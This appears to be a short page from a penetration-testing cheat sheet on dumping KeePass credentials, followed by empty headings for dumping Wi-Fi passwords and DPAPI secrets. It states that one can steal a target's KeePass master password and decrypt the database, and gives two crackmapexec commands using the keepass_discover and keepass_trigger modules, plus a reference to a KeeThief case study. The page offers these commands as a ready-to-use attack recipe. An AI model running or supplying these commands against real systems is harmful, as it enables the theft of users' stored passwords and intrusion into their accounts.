Dump KeePass

You can check if keepass is installed on the target computer and then steal the master password and decrypt the database !
$ crackmapexec smb <ip> -u user -p pass -M keepass_discover
$ crackmapexec smb <ip> -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"
KeeThief - A Case Study in Attacking KeePass Part 2 - harmj0y
harmj0y

Dump WIFI password

Dump DPAPI

Last modified 14d ago